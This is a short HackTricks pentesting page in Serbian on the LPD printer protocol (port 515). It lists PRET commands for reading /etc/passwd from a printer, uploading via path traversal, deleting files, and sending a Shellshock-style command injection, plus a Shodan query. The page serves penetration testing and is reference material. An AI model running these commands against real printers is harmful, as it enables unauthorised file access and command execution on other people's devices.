tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Uvod u LPD protokol
U 1980-im, Line Printer Daemon (LPD) protokol je razvijen u Berkeley Unix-u, koji je kasnije formalizovan kroz RFC1179. Ovaj protokol funkcioniše preko porta 515/tcp, omogućavajući interakcije putem lpr
komande. Suština štampanja putem LPD-a uključuje slanje kontrolne datoteke (za specifikaciju detalja posla i korisnika) zajedno sa datotekom podataka (koja sadrži informacije za štampanje). Dok kontrolna datoteka omogućava izbor različitih formata datoteka za datoteku podataka, rukovanje ovim datotekama određuje specifična LPD implementacija. Široko prepoznata implementacija za Unix-slične sisteme je LPRng. Važno je napomenuti da se LPD protokol može iskoristiti za izvršavanje malicioznih PostScript ili PJL print poslova.
Alati za interakciju sa LPD štampačima
PRET uvodi dva osnovna alata, lpdprint
i lpdtest
, koji nude jednostavan način za interakciju sa LPD-kompatibilnim štampačima. Ovi alati omogućavaju niz akcija od štampanja podataka do manipulacije datotekama na štampaču, kao što su preuzimanje, otpremanje ili brisanje:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Za pojedince koji su zainteresovani za dalje istraživanje oblasti hacking-a štampača, sveobuhvatan resurs može se pronaći ovde: Hacking Printers.
Shodan
port 515
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.